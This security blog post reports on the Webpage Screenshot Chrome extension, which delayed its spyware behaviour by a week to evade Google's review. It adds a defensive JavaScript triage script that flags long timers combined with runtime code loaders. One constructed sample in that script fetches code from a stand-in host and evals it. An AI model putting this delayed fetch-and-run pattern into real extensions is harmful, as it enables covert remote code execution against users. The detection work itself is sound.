Popular Chrome extension turns out to be Spyware!
If an extension is listed for Chrome and has a decent rating, it is surely safe to install, right? Maybe not. In today’s world spying has become a common activity. That does not make it any more acceptable. A Chrome extension known as Webpage Screenshot collects private information about its users and shamelessly sells it to a third party. What is astonishing is that the extension has an excellent rating of 4.5 stars and has been downloaded by 1.2 million users worldwide. This highlights the lack of awareness among users as to what such programs actually do behind the scenes.
Extension turns into Spyware after one week
According to the founder of the CSIS Security Group, Peter Kruse:
“To avoid any security check or detection mechanism from Google, Webpage Screenshot includes a sleep function, so that the spyware-like behavior will not be activated right away, but a week later.”
Google’s security check usually filters out malicious extensions from the Chrome library, which is probably why the original software does not act like spyware at all. After a week, however, it downloads additional components/code and commences the spying program. This way, the spyware part of the code evades the scanners. Once activated, the spyware component collects sensitive information about the user and transmits it to the IP address 220.127.116.11, located in New York, USA.
Heimdal Security have analysed this extension in detail and confirmed that the transmitted information could be used to identify an individual, which definitely makes this a privacy threat.
The greater concern, though, is that several other extensions may also be using the same method to avoid Google’s security measures. This is a serious vulnerability and could allow cyber criminals to use Chrome apps and extensions for their malicious activities. They simply have to add the malicious part a day, a week or a month later.
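When reviewing the source of an installed extension, a defender can look for the combination described above: a long constant delay together with code that is loaded at run time rather than shipped in the reviewed package. The following is an added example, not code from the original article or from Google, CSIS or Heimdal Security; the thresholds, function names and both sample sources are constructed for illustration.

```javascript
// Added example: static triage for "sleeper" extension code.
// Thresholds, names and both sample sources are constructed for illustration.
const DAY_MS = 24 * 60 * 60 * 1000;
const PRODUCT = /\d+(?:\s*\*\s*\d+)*/g; // e.g. 604800000 or 7 * 24 * 60 * 60 * 1000
const product = (text) => text.split('*').reduce((acc, n) => acc * Number(n), 1);

// Constant delays between one day and one year, in milliseconds or alarm minutes.
function longDelays(src) {
  const hits = [];
  for (const m of src.matchAll(PRODUCT)) {
    const ms = product(m[0]);
    if (ms >= DAY_MS && ms <= 366 * DAY_MS) hits.push(m[0]);
  }
  const alarm = /delayInMinutes\s*:\s*(\d+(?:\s*\*\s*\d+)*)/.exec(src);
  if (alarm && product(alarm[1]) >= 24 * 60) hits.push(`alarm: ${alarm[1]}`);
  return hits;
}

// Ways an extension can run code that was not in the reviewed package.
const LOADERS = {
  'eval': /\beval\s*\(/,
  'Function constructor': /\bnew\s+Function\s*\(/,
  'executeScript code string': /executeScript\s*\([^)]*\bcode\s*:/,
  'injected script element': /createElement\s*\(\s*['"]script['"]\s*\)/,
};

// Flag only when both signals occur: a long timer AND late-loaded code.
function triage(src) {
  const delays = longDelays(src);
  const loaders = Object.keys(LOADERS).filter((name) => LOADERS[name].test(src));
  return { delays, loaders, suspicious: delays.length > 0 && loaders.length > 0 };
}

// Constructed sample: waits a week after install, then runs fetched text.
const SLEEPER = `
chrome.storage.local.get('t0', ({ t0 }) => {
  if (Date.now() - t0 > 7 * 24 * 60 * 60 * 1000) {
    fetch('https://updates.example.invalid/c.js').then(r => r.text()).then(t => eval(t));
  }
});`;

// Constructed sample: a long cache lifetime alone is not enough to flag.
const BENIGN = `
const CACHE_TTL = 30 * 24 * 60 * 60 * 1000;
function isStale(savedAt) { return Date.now() - savedAt > CACHE_TTL; }`;

for (const [name, src] of Object.entries({ SLEEPER, BENIGN })) {
  console.log(name, JSON.stringify(triage(src)));
}
```

A hit only marks a file for manual review: delays that are computed or obfuscated rather than written as constants will not match these patterns.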
Luckily, in this case, Google acted quickly to take down this spyware extension from their store, but there is certainly a bigger problem that needs to be addressed with the current app/extension verification system.
Have a nice (spyware-free) day!